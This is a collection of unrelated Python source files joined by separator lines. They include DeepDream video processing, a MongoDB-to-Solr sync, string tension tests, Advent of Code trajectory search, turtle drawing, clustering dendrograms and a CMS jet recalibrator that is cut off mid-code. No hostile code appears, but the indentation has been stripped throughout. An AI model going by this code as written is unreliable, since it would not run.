os.makedirs(tmp_input_dir, exist_ok=True)
os.makedirs(tmp_output_dir, exist_ok=True)
metadata = video_utils.extract_frames(video_path, tmp_input_dir)
config['fps'] = metadata['fps']
utils.print_deep_dream_video_header(config)
last_img = None
config['img_width'] = 960
for frame_id, frame_name in enumerate(sorted(os.listdir(tmp_input_dir))):
# Step 1: load the video frame
print(f'Processing frame {frame_id}')
frame_path = os.path.join(tmp_input_dir, frame_name)
frame = utils.load_image(frame_path, target_shape=config['img_width'])
# Step 2: potentially blend it with the last frame
if config['blend'] is not None and last_img is not None:
# blend: 1.0 - use the current frame, 0.0 - use the last frame, everything in between will blend the two
frame = utils.linear_blend(last_img, frame, config['blend'])
if frame_id < 35:
last_img = frame
dreamed_frame = frame
dump_path = utils.save_and_maybe_display_image(config, dreamed_frame, name_modifier=frame_id)
print(f'Saved DeepDream frame to: {os.path.relpath(dump_path)}\n')
continue
# Step 3: Send the blended frame to some good old DeepDreaming
if frame_id in range(35,44):
factor = 0
elif frame_id in range(44,55):
factor = 1
elif frame_id in range(55,65):
factor = 2
elif frame_id in range(65,75):
factor = 3
elif frame_id in range(75,85):
factor = 4
else:
factor = 5
config['model_name'] = SupportedModels.RESNET50.name
config['pretrained_weights'] = SupportedPretrainedWeights.PLACES_365.name
config['layers_to_use'] = ['layer3'] # layer34 was used
config['pyramid_size'] = 1 + factor #1-4
config['pyramid_ratio'] = 1.5 + 0.1*factor#1.8
config['num_gradient_ascent_iterations'] = 7 + factor#10
config['lr'] = 0.09
config['spatial_shift_size'] = 30 + factor*2#40
dreamed_frame = deep_dream_static_image(config, frame)
# Step 4: save the frame and keep the reference
last_img = dreamed_frame
dump_path = utils.save_and_maybe_display_image(config, dreamed_frame, name_modifier=frame_id)
print(f'Saved DeepDream frame to: {os.path.relpath(dump_path)}\n')
video_utils.create_video_from_intermediate_results(config)
shutil.rmtree(tmp_input_dir) # remove tmp files
print(f'Deleted tmp frame dump directory {tmp_input_dir}.')
if __name__ == "__main__":
# Only a small subset is exposed by design to avoid cluttering
parser = argparse.ArgumentParser()
# Common params
parser.add_argument("--input", type=str, help="Input IMAGE or VIDEO name that will be used for dreaming", default='figures.jpg')
parser.add_argument("--img_width", type=int, help="Resize input image to this width", default=600)
parser.add_argument("--layers_to_use", type=str, nargs='+', help="Layer whose activations we should maximize while dreaming", default=['relu3_3'])
parser.add_argument("--model_name", choices=[m.name for m in SupportedModels],
help="Neural network (model) to use for dreaming", default=SupportedModels.VGG16_EXPERIMENTAL.name)
parser.add_argument("--pretrained_weights", choices=[pw.name for pw in SupportedPretrainedWeights],
help="Pretrained weights to use for the above model", default=SupportedPretrainedWeights.IMAGENET.name)
# Main params for experimentation (especially pyramid_size and pyramid_ratio)
parser.add_argument("--pyramid_size", type=int, help="Number of images in an image pyramid", default=4)
parser.add_argument("--pyramid_ratio", type=float, help="Ratio of image sizes in the pyramid", default=1.8)
parser.add_argument("--num_gradient_ascent_iterations", type=int, help="Number of gradient ascent iterations", default=10)
parser.add_argument("--lr", type=float, help="Learning rate i.e. step size in gradient ascent", default=0.09)
# deep_dream_video_ouroboros specific arguments (ignore for other 2 functions)
parser.add_argument("--create_ouroboros", action='store_true', help="Create Ouroboros video (default False)")
parser.add_argument("--ouroboros_length", type=int, help="Number of video frames in ouroboros video", default=30)
parser.add_argument("--fps", type=int, help="Number of frames per second", default=30)
parser.add_argument("--frame_transform", choices=[t.name for t in TRANSFORMS],
help="Transform used to transform the output frame and feed it back to the network input",
default=TRANSFORMS.ZOOM_ROTATE.name)
# deep_dream_video specific arguments (ignore for other 2 functions)
parser.add_argument("--blend", type=float, help="Blend coefficient for video creation", default=0.85)
# You usually won't need to change these as often
parser.add_argument("--should_display", action='store_true', help="Display intermediate dreaming results (default False)")
parser.add_argument("--spatial_shift_size", type=int, help='Number of pixels to randomly shift image before grad ascent', default=32)
parser.add_argument("--smoothing_coefficient", type=float, help='Directly controls standard deviation for gradient smoothing', default=0.5)
parser.add_argument("--use_noise", action='store_true', help="Use noise as a starting point instead of input image (default False)")
args = parser.parse_args()
# Wrapping configuration into a dictionary
config = dict()
for arg in vars(args):
config[arg] = getattr(args, arg)
config['dump_dir'] = OUT_VIDEOS_PATH if config['create_ouroboros'] else OUT_IMAGES_PATH
config['dump_dir'] = os.path.join(config['dump_dir'], f'{config["model_name"]}_{config["pretrained_weights"]}')
config['input_name'] = os.path.basename(config['input'])
# Create Ouroboros video (feeding neural network's output to it's input)
if config['create_ouroboros']:
deep_dream_video_ouroboros(config)
# Create a blended DeepDream video
elif any([config['input_name'].lower().endswith(video_ext) for video_ext in SUPPORTED_VIDEO_FORMATS]): # only support mp4 atm
deep_dream_video(config)
else: # Create a static DeepDream image
print('Dreaming started!')
img = deep_dream_static_image(config, img=None) # img=None -> will be loaded inside of deep_dream_static_image
dump_path = utils.save_and_maybe_display_image(config, img)
print(f'Saved DeepDream static image to: {os.path.relpath(dump_path)}\n')
|
from .SearchTree import SearchTree, ActionNode, ChanceNode, expand_action, Node, MCTS_Info, HeuristicVector
from .Samplers import MockPolicy, Policy
from .searchers.search_util import ContinueCondition
from .searchers.deterministic import deterministic_tree_search_rollout, get_node_value, mcts_ucb_rollout
from .searchers.mcts import vanilla_mcts_rollout
|
#!/usr/bin/env python
# The outputManager synchronizes the output display for all the various threads
#####################
import threading
class outputStruct():
def __init__( self ):
self.id = 0
self.updateObjSem = None
self.title = ""
self.numOfInc = 0
class outputManager( threading.Thread ):
def __init__( self ):
threading.Thread.__init__(self)
self.outputObjs = dict()
self.outputListLock = threading.Lock()
# Used to assign the next id for an output object
self.nextId = 0
self.isAlive = True
def createOutputObj( self, name, numberOfIncrements ):
raise NotImplementedError('Should have implemented this')
def updateOutputObj( self, objectId ):
raise NotImplementedError('Should have implemented this')
def run (self):
raise NotImplementedError('Should have implemented this')
def stop(self):
self.isAlive = False
|
from errbot import BotPlugin, botcmd
class Example(BotPlugin):
"""
This is a very basic plugin to try out your new installation and get you started.
Feel free to tweak me to experiment with Errbot.
You can find me in your init directory in the subdirectory plugins.
"""
@botcmd # flags a command
def tryme(self, msg, args): # a command callable with !tryme
"""
Execute to check if Errbot responds to command.
Feel free to tweak me to experiment with Errbot.
You can find me in your init directory in the subdirectory plugins.
"""
return "It *works* !" # This string format is markdown.
|
#!/usr/bin/env python3
import os,sys
import traceback
from pymongo import MongoClient
from bson.objectid import ObjectId
from data_backup import Data_backup
from solr import SOLR
from solr import SOLR_CORE_NAME
'''
_id => str(_id)
增加scene:db_name topic:collection
如果有super_intention字段且为空,则替换为null
如果有questions或equal_questions字段,拆开存储
{question, question_ik, question_cn},并清除questions或equal_questions
'''
class Update():
def __init__(self, ip, db_name):
self.db_name = db_name
self.db = MongoClient('127.0.0.1', 27017)[db_name]
self.core_name = SOLR_CORE_NAME
self.solr_url = 'http://127.0.0.1:8999/solr'
self.solr = SOLR(self.solr_url)
def check_solr_core(self):
if not self.solr.solr_core_exists(self.core_name):
self.solr.create_solr_core(self.core_name)
def update_data(self, collection):
def insert(data):
if not data:
return
data_one = data.copy()
data_one['_id'] = str(data_one['_id'])
data_one['scene'] = self.db_name
data_one['topic'] = collection
if 'super_intention' in data_one:
if data_one['super_intention'] == '':
data_one['super_intention'] = 'null'
if 'equal_questions' in data_one:
data_one.pop('equal_questions')
for q in data['equal_questions']:
data_one['question'] = q
data_one['question_ik'] = q
data_one['question_cn'] = q
self.solr.update_solr(data_one, self.core_name)
elif 'questions' in data_one:
data_one.pop('questions')
for q in data['questions']:
data_one['question'] = q
data_one['question_ik'] = q
data_one['question_cn'] = q
self.solr.update_solr(data_one, self.core_name)
else:
self.solr.update_solr(data_one, self.core_name)
self.solr.delete_solr_by_query(self.core_name,
'scene_str:'+self.db_name+' AND topic_str:'+collection)
data = [x for x in self.db[collection].find()]
for d in data:
insert(d)
def update(self):
try:
collections = self.db.collection_names()
if 'log' in collections:
collections.remove('log')
for collection in collections:
print('start '+collection)
self.update_data(collection)
return 1
except Exception:
traceback.print_exc()
return 0
if __name__ == '__main__':
up = Update('127.0.0.1', 'bank_psbc')
up.update()
|
# -*- coding: utf-8 -*-
# MIT License
#
# Copyright (c) 2022 David E. Lambert
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import math
import pytest
import tomli
from tealc import StringTension
with open('./tests/data/string_data.toml', 'rb') as f:
string_data = tomli.load(f)
material = []
pitch = []
gauge = []
tension = []
for m in string_data.keys():
for p in string_data[m].keys():
n = len(string_data[m][p]['gauge'])
material.extend([m] * n)
pitch.extend([p] * n)
gauge.extend(string_data[m][p]['gauge'])
tension.extend(string_data[m][p]['tension'])
guitar_data = list(zip(gauge, material, pitch, tension))
@pytest.mark.parametrize('test_g, test_m, test_p, expected', guitar_data)
def test_accuracy(test_g, test_m, test_p, expected):
"""Test calculations against mfr. charts."""
calc = StringTension(test_g, test_m, test_p, length=25.5)
assert math.isclose(calc.lb, expected, rel_tol=0.1)
with open('./tests/data/bass_string_data.toml', 'rb') as f:
bass_string_data = tomli.load(f)
b_material = []
b_pitch = []
b_gauge = []
b_tension = []
for m in bass_string_data.keys():
for p in bass_string_data[m].keys():
n = len(bass_string_data[m][p]['gauge'])
b_material.extend([m] * n)
b_pitch.extend([p] * n)
b_gauge.extend(bass_string_data[m][p]['gauge'])
b_tension.extend(bass_string_data[m][p]['tension'])
bass_data = list(zip(b_gauge, b_material, b_pitch, b_tension))
print(bass_data)
@pytest.mark.parametrize('test_g, test_m, test_p, expected', bass_data)
def test_bass_accuracy(test_g, test_m, test_p, expected):
"""Test bass string calculations against mfr. charts."""
calc = StringTension(test_g, test_m, test_p, length=34)
assert math.isclose(calc.lb, expected, rel_tol=0.1)
|
import inspect
import logging
import sys
from datetime import timedelta
from .. import heating, sensing
from ..utils import broadcast, time_utils, translation
_ = translation.translator_fx()
_logger = logging.getLogger('NonHeatingJobs')
def function_names_for_non_heating_jobs():
"""Returns the function names available for scheduling as a NonHeatingJob."""
this_module = sys.modules[__name__]
functions = inspect.getmembers(this_module, inspect.isfunction)
exclude = ['function_names_for_non_heating_jobs', 'get_job_function']
return [f[0] for f in functions if f[0] not in exclude and not f[0].startswith('_')]
def dummy_task():
"""Task used for testing and (early) development stages."""
_logger.info(f"Scheduled heartbeat message at {time_utils.t_now_local()}.")
def log_temperature_sensors():
"""Stores the current temperature readings."""
sensing.save_temperature_log()
def check_temperature_sensors():
"""Hourly check if temperature sensors are still connected."""
sensing.check_sensors()
def clean_old_dbase_entries():
"""
Daily clean up script to remove outdated entries from the dbase, because we
don't want to (and also cannot) store everything.
"""
# Clear entries older than 4 weeks
# So we should be able to keep the dbase at approximately 65 MB, because
# 1 log entry (every 5 minutes) with 5 sensors makes up ca. 8.2kB
dt = time_utils.dt_now_local() - timedelta(days=28)
# Temperature sensor log:
rsp = sensing.temperature_log.clear_old_entries(dt)
if not rsp.success:
_logger.error('Could not clear outdated sensor log entries.')
broadcast.error(rsp.message, receiver='both', source=broadcast.SRC_SENSOR_LOG)
else:
_logger.info(rsp.message)
# Central heating log:
rsp = heating.central_heating_log.clear_old_entries(dt)
if not rsp.success:
_logger.error('Could not clear outdated central heating log entries.')
broadcast.error(rsp.message, receiver='both', source=broadcast.SRC_CENTRAL_HEATING_LOG)
else:
_logger.info(rsp.message)
def get_job_function(job_type):
"""
Returns the callback function for the NonHeatingJob.
The name of the callback function is given by "job_type".
"""
this_module = sys.modules[__name__]
return getattr(this_module, job_type)
|
#!/usr/bin/env python3
"""Monte Carlo blackbox collocation-based FEM system id."""
import argparse
import importlib
import os
import pathlib
import numpy as np
import scipy.io
import sympy
import sym2num.model
import fem
import symfem
# Reload modules for testing
for m in (fem, symfem):
importlib.reload(m)
class Model(symfem.MaximumLikelihoodDTModel, symfem.BalancedDTModel):
generated_name = 'GeneratedBalancedMaximumLikelihoodModel'
class MLProblem(fem.MaximumLikelihoodDTProblem, fem.BalancedDTProblem):
pass
def load_data(datafile):
data = scipy.io.loadmat(datafile)
# Retrieve data
u = data['u']
y = data['y']
N = len(y)
ue = u[N//2:]
ye = y[N//2:]
uv = u[:N//2]
yv = y[:N//2]
return uv, yv, ue, ye
def load_estimates(datafile):
estfile = datafile.parent / ('estim_' + datafile.name)
return scipy.io.loadmat(estfile)
def predict(mdl, y, u, x0=None):
A = mdl['A']
B = mdl['B']
C = mdl['C']
D = mdl['D']
Lun = mdl['Lun']
nx = len(A)
N = len(y)
if x0 is None:
x0 = np.zeros(nx)
x = np.tile(x0, (N, 1))
eun = np.empty_like(y)
for k in range(N):
eun[k] = y[k] - C @ x[k] - D @ u[k]
if k+1 < N:
x[k+1] = A @ x[k] + B @ u[k] + Lun @ eun[k]
Rp = 1/N * eun.T @ eun
sRp = np.linalg.cholesky(Rp)
def estimate(datafile):
pass
def get_model(config):
nx = config['nx']
nu = config['nu']
ny = config['ny']
modname = f'{Model.generated_name}_nx{nx}_nu{nu}_ny{ny}'
try:
mod = importlib.import_module(modname)
cls = getattr(mod, Model.generated_name)
return cls()
except ImportError:
symmodel = Model(nx=nx, nu=nu, ny=ny)
with open(f'{modname}.py', mode='w') as f:
print(symmodel.print_code(), file=f)
return get_model(config)
def cmdline_args():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument(
'edir', nargs='?', default='data/mc_experim',
help='experiment directory',
)
return parser.parse_args()
if __name__ == '__main__':
args = cmdline_args()
edir = pathlib.Path(args.edir)
config = scipy.io.loadmat(edir / 'config.mat', squeeze_me=True)
model = get_model(config)
datafiles = sorted(edir.glob('exp*.mat'))
for datafile in datafiles:
uv, yv, ue, ye = load_data(datafile)
in_prob = fem.InnovationDTProblem(model, ye, ue)
ml_prob = MLProblem(model, ye, ue)
raise SystemExit
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'text_editor.ui'
#
# Created: Sun Nov 15 17:09:47 2009
# by: PyQt4 UI code generator 4.6.1
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
class Ui_DockWidget(object):
def setupUi(self, DockWidget):
DockWidget.setObjectName("DockWidget")
DockWidget.setWindowModality(QtCore.Qt.NonModal)
DockWidget.setEnabled(True)
DockWidget.resize(548, 556)
font = QtGui.QFont()
font.setPointSize(10)
DockWidget.setFont(font)
DockWidget.setFocusPolicy(QtCore.Qt.TabFocus)
DockWidget.setContextMenuPolicy(QtCore.Qt.PreventContextMenu)
DockWidget.setAcceptDrops(False)
DockWidget.setFloating(False)
DockWidget.setFeatures(QtGui.QDockWidget.AllDockWidgetFeatures)
DockWidget.setAllowedAreas(QtCore.Qt.AllDockWidgetAreas)
self.dockWidgetContents = QtGui.QWidget()
self.dockWidgetContents.setObjectName("dockWidgetContents")
self.gridLayout = QtGui.QGridLayout(self.dockWidgetContents)
self.gridLayout.setObjectName("gridLayout")
self.textEdit = QtGui.QTextEdit(self.dockWidgetContents)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.textEdit.sizePolicy().hasHeightForWidth())
self.textEdit.setSizePolicy(sizePolicy)
self.textEdit.setAcceptDrops(False)
self.textEdit.setFrameShadow(QtGui.QFrame.Plain)
self.textEdit.setLineWidth(0)
self.textEdit.setAcceptRichText(False)
self.textEdit.setObjectName("textEdit")
self.gridLayout.addWidget(self.textEdit, 0, 0, 1, 1)
DockWidget.setWidget(self.dockWidgetContents)
self.retranslateUi(DockWidget)
QtCore.QMetaObject.connectSlotsByName(DockWidget)
def retranslateUi(self, DockWidget):
DockWidget.setWindowTitle(QtGui.QApplication.translate("DockWidget", "Mapnik Xml View", None, QtGui.QApplication.UnicodeUTF8))
self.textEdit.setHtml(QtGui.QApplication.translate("DockWidget", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Lucida Grande\'; font-size:10pt; font-weight:400; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:11pt;\"></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from .models import shipment
admin.site.register(shipment)
|
#!/bin/python
import sys, os
sys.path.append("/network/lustre/iss01/home/daniel.margulies/data/lsd/")
from load_fs import load_fs
import numpy as np
import nibabel as nib
from mapalign import embed
from numba import jit
from scipy.sparse.linalg import eigsh
from scipy import sparse
@jit(parallel=True)
def run_perc(data, thresh):
perc_all = np.zeros(data.shape[0])
for n,i in enumerate(data):
data[n, i < np.percentile(i, thresh)] = 0.
for n,i in enumerate(data):
data[n, i < 0.] = 0.
return data
def main(s):
import os.path
if os.path.isfile('/network/lustre/iss01/home/daniel.margulies/data/lsd/embedding/embedding_dense_emb.%s.npy' % s):
emb = np.load('/network/lustre/iss01/home/daniel.margulies/data/lsd/embedding/embedding_dense_emb.%s.npy' % s)
else:
K = load_fs(s)
K[np.isnan(K)] = 0.0
A_mA = K - K.mean(1)[:,None]
ssA = (A_mA**2).sum(1)
Asq = np.sqrt(np.dot(ssA[:,None],ssA[None]))
Adot = A_mA.dot(A_mA.T)
K = Adot/Asq
del A_mA, ssA, Asq, Adot
K = run_perc(K, 90)
norm = (K * K).sum(0, keepdims=True) ** .5
K = K.T @ K
aff = K / norm / norm.T
del norm, K
#aff = sparse.csr_matrix(aff)
emb, res = embed.compute_diffusion_map(aff, alpha = 0.5, n_components=5, skip_checks=True, overwrite=True, eigen_solver=eigsh, return_result=True)
del aff
np.save('/network/lustre/iss01/home/daniel.margulies/data/lsd/embedding/embedding_dense_emb.%s.npy' % s, emb)
np.save('/network/lustre/iss01/home/daniel.margulies/data/lsd/embedding/embedding_dense_res.%s.npy' % s, res)
if __name__ == "__main__":
main(sys.argv[1])
|
#!/usr/bin/python3
from setuptools import setup, find_packages
setup(
name="RedPaper",
version="1.0",
install_requires=['docutils>=0.3', 'praw>=6.2.0'],
# metadata to display on PyPI
author="Teddy Okello",
author_email="keystroke3@gmail.com",
description="A program to download and change desktop wallpapers",
license="PSF",
keywords="change wallpaper reddit in linux desktop gnome kde xfce budgie",
url="https://github.com/keystroke3/redpaper", # project home page, if any
project_urls={
"Bug Tracker": "https://github.com/keystroke3/redpaper/issues",
"Documentation": "https://github.com/keystroke3/redpaper/wiki",
"Source Code": "https://github.com/keystroke3/redpaper",
}
)
|
# poropy/coretools/vendor.py
class Vendor(object):
""" Fresh fuel vendor. *NOT IMPLEMENTED*
"""
def __init__(self):
""" Constructor.
"""
|
import re
with open("input", "r") as f:
lines = f.readlines()
lines = [line.strip() for line in lines if line.strip()]
class TargetArea:
def __init__(self, desc_str):
target_area_regexp = re.compile("target area: x=([0-9]+)\\.\\.([0-9]+), y=(-[0-9]+)\\.\\.(-[0-9]+)")
bounds = target_area_regexp.findall(desc_str)[0]
self.x_bounds = (int(bounds[0]), int(bounds[1]))
self.y_bounds = (int(bounds[2]), int(bounds[3]))
def point_inside(self, x, y):
return self.x_bounds[0] <= x <= self.x_bounds[1] and self.y_bounds[0] <= y <= self.y_bounds[1]
def point_beyond(self, x, y):
return x > max(self.x_bounds) or y < min(self.y_bounds)
ta = TargetArea(lines[0])
global_max_y = 0
for ivx in range(1, max(ta.x_bounds) + 1):
# iterate over Initial Velocity X (ivx)
# the maximum ivx value is the furthest side of the target area (on the X axis)
for ivy in range(min(ta.y_bounds), max(abs(ta.y_bounds[0]), abs(ta.y_bounds[1]))):
# iterate over Initial Velocity Y (ivy)
#
# the Initial Velocity Y (ivy) starts at the deepest side of the target area (on the Y axis)
#
# there is always a step with y=0 (whatever ivy is)
# so there is no point trying ivy greater than the deepest side of
# target area as we are sure the probe will always miss
# this is the end of the `while True` loop over ivy
# probe's highest y position for the given (ivx, ivy)
max_y = 0
# probe's initial position and velocity
x = 0
y = 0
vy = ivy
vx = ivx
while not ta.point_beyond(x, y):
# update probe's position
x += vx
y += vy
# update probe's highest y position
max_y = max(max_y, y)
if ta.point_inside(x, y):
# the probe landed insed the target area
global_max_y = max(global_max_y, max_y)
break
# update vx and vy
if vx > 0:
vx -= 1
elif vx < 0:
vx += 1
vy -= 1
print(global_max_y)
|
#################################################################################
# Author: Jacob Barnwell Taran Wells
# Username: barnwellj wellst
#
# Assignment: TO3
# Purpose:
#################################################################################
# Acknowledgements:
#
#
#################################################################################
import turtle
def draw_square(jimmy):
"""Creates the box for the drawing
"""
jimmy.penup()
jimmy.setpos(-250,250)
jimmy.pendown()
for s in range(4):
jimmy.forward(594)
jimmy.right(90)
pass
# ...
def right_turns(jimmy):
"""right turns within the box
"""
jimmy.forward(550)
jimmy.right(90)
jimmy.forward(22)
jimmy.right(90)
pass
# ...
def left_turns(jimmy):
"""left turns within the box
"""
jimmy.forward(550)
jimmy.left(90)
jimmy.forward(22)
jimmy.left(90)
pass
def main():
"""
Docstring for main
"""
# ...
wn = turtle.Screen()
jimmy = turtle.Turtle()
jimmy.color("black") # importing the Turtle and screen, applying attributes
jimmy.pensize(22)
jimmy.speed(15)
draw_square(jimmy) # Function to draw the main square
jimmy.penup()
jimmy.forward(22)
jimmy.right(90)
jimmy.forward(22)
jimmy.left(90)
jimmy.color("blue")
jimmy.pendown()
for i in range(12):
right_turns(jimmy) # Function call to function_2
left_turns(jimmy) # Function call to function_3
right_turns(jimmy) #finishes the fill
jimmy.forward(550)
wn.exitonclick()
main()
|
# Generated with RandomSeedGeneration
#
from enum import Enum
from enum import auto
class RandomSeedGeneration(Enum):
""""""
INTRINSIC = auto()
RANLUX = auto()
RNSNLW = auto()
def label(self):
if self == RandomSeedGeneration.INTRINSIC:
return "Intrinsic"
if self == RandomSeedGeneration.RANLUX:
return "RanLux"
if self == RandomSeedGeneration.RNSNLW:
return "RNSNLW"
|
#création des matrices
#IMPORTS
import json
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.cluster import KMeans
from sklearn.metrics import adjusted_rand_score
from scipy.cluster.hierarchy import dendrogram, linkage
from matplotlib import pyplot as plt
import glob
import codecs
import sys
from numpy import ndarray
import array
import re
#import scipy.cluster.hierarchy as shc
fic = sys.argv[1]
#Ouverture/récupération du fichier des patterns
#f = open("patterns/patt_dumas_feval_minlen=1_maxlen=1.json")
f = open(fic)
dic = json.load(f)
f.close()
data = dic["all_files"]
patterns = dic["all_patt"]
liste_fichiers = list(data.keys()) #l'ordre est fixe | list() est obligatoire pour liste_fichiers[cpt]
matrix = []
for fichier in liste_fichiers :
matrix.append(data[fichier])
noms_abreges = [re.sub(r"corpus1\/(.*\/.*).txt.*", r"\1", nom) for nom in liste_fichiers]
labelList = noms_abreges
#OK
#plt.figure(figsize=(10, 7))
#plt.title("Customer Dendograms")
#dend = shc.dendrogram(shc.linkage(matrix, method='ward'))
liste_methodes = ['single', 'complete', 'average', 'weighted', 'centroid', 'median', 'ward']
for methode in liste_methodes :
linked = linkage(matrix, methode)
plt.figure(figsize=(10, 7))
plt.title("Dendrogramme (méthode '%s', paramètres par défaut)"%methode)
dendrogram(linked, orientation='top', labels=labelList, leaf_rotation = 90., distance_sort='descending', show_leaf_counts=True)
plt.savefig("results/scipy_dendogram_cdf_%s_default.png"%methode, bbox_inches='tight')
|
Experiment(description='Relational ABCD',
data_dir='../srkl-data/stocks/',
max_depth=5,
random_order=False,
k=1,
debug=False,
local_computation=True,
n_rand=9,
sd=2,
jitter_sd=0.1,
max_jobs=400,
verbose=False,
make_predictions=True,
skip_complete=True,
results_dir='../srkl-results/stocks/',
iters=250,
base_kernels='SE,Per,Lin,Const,Noise',
random_seed=1,
period_heuristic=3,
max_period_heuristic=5,
period_heuristic_type='min',
subset=True,
subset_size=250,
full_iters=10,
bundle_size=5,
additive_form=False,
mean='ff.MeanZero()',
kernel='ff.NoiseKernel()',
lik='ff.LikGauss(sf=-np.Inf)',
score='bic',
search_operators=[('A', ('+', 'A', 'B'), {'A': 'kernel', 'B': 'base'}),
('A', ('*', 'A', 'B'), {'A': 'kernel', 'B': 'base-not-const'}),
('A', ('*-const', 'A', 'B'), {'A': 'kernel', 'B': 'base-not-const'}),
('A', 'B', {'A': 'kernel', 'B': 'base'}),
('A', ('CP', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
#('A', ('PCP1', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
#('A', ('PCP2', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
('A', ('CW', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
('A', ('PCW', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
# ('A', ('B', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
# ('A', ('BL', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
# ('A', ('PB', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
# ('A', ('PBP1', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
# ('A', ('PBP2', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
('A', ('None',), {'A': 'kernel'})]
)
|
import ROOT
import os, types
from math import *
from PhysicsTools.HeppyCore.utils.deltar import *
class JetReCalibrator:
def __init__(self,globalTag,jetFlavour,doResidualJECs,jecPath,upToLevel=3,
calculateSeparateCorrections=False,
calculateType1METCorrection=False, type1METParams={'jetPtThreshold':15., 'skipEMfractionThreshold':0.9, 'skipMuons':True} ):
"""Create a corrector object that reads the payloads from the text dumps of a global tag under
CMGTools/RootTools/data/jec (see the getJec.py there to make the dumps).
It will apply the L1,L2,L3 and possibly the residual corrections to the jets.
If configured to do so, it will also compute the type1 MET corrections."""
self.globalTag = globalTag
self.jetFlavour = jetFlavour
self.doResidualJECs = doResidualJECs
self.jecPath = jecPath
self.upToLevel = upToLevel
self.calculateType1METCorr = calculateType1METCorrection
self.type1METParams = type1METParams
# Make base corrections
path = os.path.expandvars(jecPath) #"%s/src/CMGTools/RootTools/data/jec" % os.environ['CMSSW_BASE'];
self.L1JetPar = ROOT.JetCorrectorParameters("%s/%s_L1FastJet_%s.txt" % (path,globalTag,jetFlavour),"");
self.L2JetPar = ROOT.JetCorrectorParameters("%s/%s_L2Relative_%s.txt" % (path,globalTag,jetFlavour),"");
self.L3JetPar = ROOT.JetCorrectorParameters("%s/%s_L3Absolute_%s.txt" % (path,globalTag,jetFlavour),"");
self.vPar = ROOT.vector(ROOT.JetCorrectorParameters)()
self.vPar.push_back(self.L1JetPar);
if upToLevel >= 2: self.vPar.push_back(self.L2JetPar);
if upToLevel >= 3: self.vPar.push_back(self.L3JetPar);
# Add residuals if needed
if doResidualJECs :
self.ResJetPar = ROOT.JetCorrectorParameters("%s/%s_L2L3Residual_%s.txt" % (path,globalTag,jetFlavour))
self.vPar.push_back(self.ResJetPar);
#Step3 (Construct a FactorizedJetCorrector object)
self.JetCorrector = ROOT.FactorizedJetCorrector(self.vPar)
if os.path.exists("%s/%s_Uncertainty_%s.txt" % (path,globalTag,jetFlavour)):
self.JetUncertainty = ROOT.JetCorrectionUncertainty("%s/%s_Uncertainty_%s.txt" % (path,globalTag,jetFlavour));
elif os.path.exists("%s/Uncertainty_FAKE.txt" % path):
self.JetUncertainty = ROOT.JetCorrectionUncertainty("%s/Uncertainty_FAKE.txt" % path);
else:
print 'Missing JEC uncertainty file "%s/%s_Uncertainty_%s.txt", so jet energy uncertainties will not be available' % (path,globalTag,jetFlavour)
self.JetUncertainty = None
self.separateJetCorrectors = {}
if calculateSeparateCorrections or calculateType1METCorrection:
self.vParL1 = ROOT.vector(ROOT.JetCorrectorParameters)()
self.vParL1.push_back(self.L1JetPar)
self.separateJetCorrectors["L1"] = ROOT.FactorizedJetCorrector(self.vParL1)
if upToLevel >= 2 and calculateSeparateCorrections:
self.vParL2 = ROOT.vector(ROOT.JetCorrectorParameters)()
for i in [self.L1JetPar,self.L2JetPar]: self.vParL2.push_back(i)
self.separateJetCorrectors["L1L2"] = ROOT.FactorizedJetCorrector(self.vParL2)
if upToLevel >= 3 and calculateSeparateCorrections:
self.vParL3 = ROOT.vector(ROOT.JetCorrectorParameters)()
for i in [self.L1JetPar,self.L2JetPar,self.L3JetPar]: self.vParL3.push_back(i)
self.separateJetCorrectors["L1L2L3"] = ROOT.FactorizedJetCorrector(self.vParL3)
if doResidualJECs and calculateSeparateCorrections:
self.vParL3Res = ROOT.vector(ROOT.JetCorrectorParameters)()
